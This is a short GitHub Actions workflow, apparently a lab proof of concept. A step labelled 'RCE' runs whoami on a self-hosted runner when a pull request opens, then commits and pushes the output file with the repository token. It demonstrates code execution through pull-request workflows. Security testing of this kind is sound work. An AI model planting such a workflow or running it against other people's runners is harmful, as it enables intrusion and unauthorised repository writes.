name: Lab Runner Test

on: [pull_request]

jobs:
  test:
    runs-on: self-hosted
    steps:
      - name: RCE
        run: |
          whoami > pwened.txt

      - name: Commit & Push changes
        run: |
          git config --local user.name "GitHub Actions"
          git config --local user.email "actions@github.com"
          git add pwened.txt
          git commit -m "Add pwened.txt results"
          git push
        env: 
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}}
